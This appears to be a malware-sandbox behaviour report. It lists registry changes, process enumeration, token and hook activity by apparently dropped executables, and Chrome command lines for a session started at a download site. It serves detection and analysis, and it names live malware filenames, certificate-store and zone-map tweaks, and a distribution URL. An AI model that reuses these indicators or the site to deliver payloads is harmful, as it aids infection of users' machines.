Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{07416f20-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	AYujpiU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{07416f20-0000-0000-0000-d01200000000}	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	AYujpiU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry class 3 IoCs

Processes:

chrome.exechrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{7694D49D-4DE5-4F46-BB9E-ED1AC35D5C14}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{DE6DE41F-4499-4F7C-95EC-6C30DAD45897}	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeIC44.exechrome.exe5x26G1xfk6ttI6.exepowershell.EXEFlKR.exepowershell.exepowershell.exepowershell.EXEAYujpiU.exe

pid	process
1400	chrome.exe
1400	chrome.exe
3160	IC44.exe
3160	IC44.exe
2760	chrome.exe
2760	chrome.exe
3160	IC44.exe
3160	IC44.exe
3160	IC44.exe
3160	IC44.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4828	powershell.EXE
4828	powershell.EXE
4828	powershell.EXE
3160	IC44.exe
3160	IC44.exe
4496	FlKR.exe
4496	FlKR.exe
4496	FlKR.exe
4496	FlKR.exe
4496	FlKR.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
4536	5x26G1xfk6ttI6.exe
3612	powershell.exe
3612	powershell.exe
3612	powershell.exe
3160	IC44.exe
3160	IC44.exe
6052	powershell.exe
6052	powershell.exe
6052	powershell.exe
5924	powershell.EXE
5924	powershell.EXE
5924	powershell.EXE
5560	AYujpiU.exe
5560	AYujpiU.exe
5560	AYujpiU.exe
5560	AYujpiU.exe
5560	AYujpiU.exe
5560	AYujpiU.exe
5560	AYujpiU.exe
5560	AYujpiU.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 55 IoCs

Processes:

chrome.exechrome.exe

pid	process
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe
Token: SeShutdownPrivilege	1400	chrome.exe
Token: SeCreatePagefilePrivilege	1400	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exechrome.exe

pid	process
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exechrome.exe

pid	process
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

Bandicam_RjOUEySS.exeis-5P4B1.tmpIC44.exeIC44.exeEgKQRibNDk7V.exeis-2T3L9.tmpZerkalo331.exe3qP1XX.exeis-KVFOL.tmpZerkalo331.exeFileDate44.exeRrZAYRw1y73jrdza.exe5x26G1xfk6ttI6.exeYH9UD8kMJQ.exeis-TE35S.tmpFlKR.exechromedriver.exechromedriver.exe

pid	process
2228	Bandicam_RjOUEySS.exe
2448	is-5P4B1.tmp
2232	IC44.exe
3160	IC44.exe
4124	EgKQRibNDk7V.exe
2132	is-2T3L9.tmp
5088	Zerkalo331.exe
1444	3qP1XX.exe
2620	is-KVFOL.tmp
4476	Zerkalo331.exe
4764	FileDate44.exe
2428	RrZAYRw1y73jrdza.exe
4536	5x26G1xfk6ttI6.exe
740	YH9UD8kMJQ.exe
4664	is-TE35S.tmp
4496	FlKR.exe
5060	chromedriver.exe
1956	chromedriver.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1400 wrote to memory of 1944	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 1944	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4184	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4028	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 4028	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe
PID 1400 wrote to memory of 2120	1400	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://mgen.fast-dl.cc/
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc855b9758,0x7ffc855b9768,0x7ffc855b9778
  2⤵
  PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1788 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:2
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5096 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:3588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:8
  2⤵
  PID:3508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5576 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=6092 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5380 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2548 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:4568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1716 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5180 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4508 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:1800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6040 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1588 --field-trial-handle=1728,i,4028552565079866131,7113513694396307726,131072 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
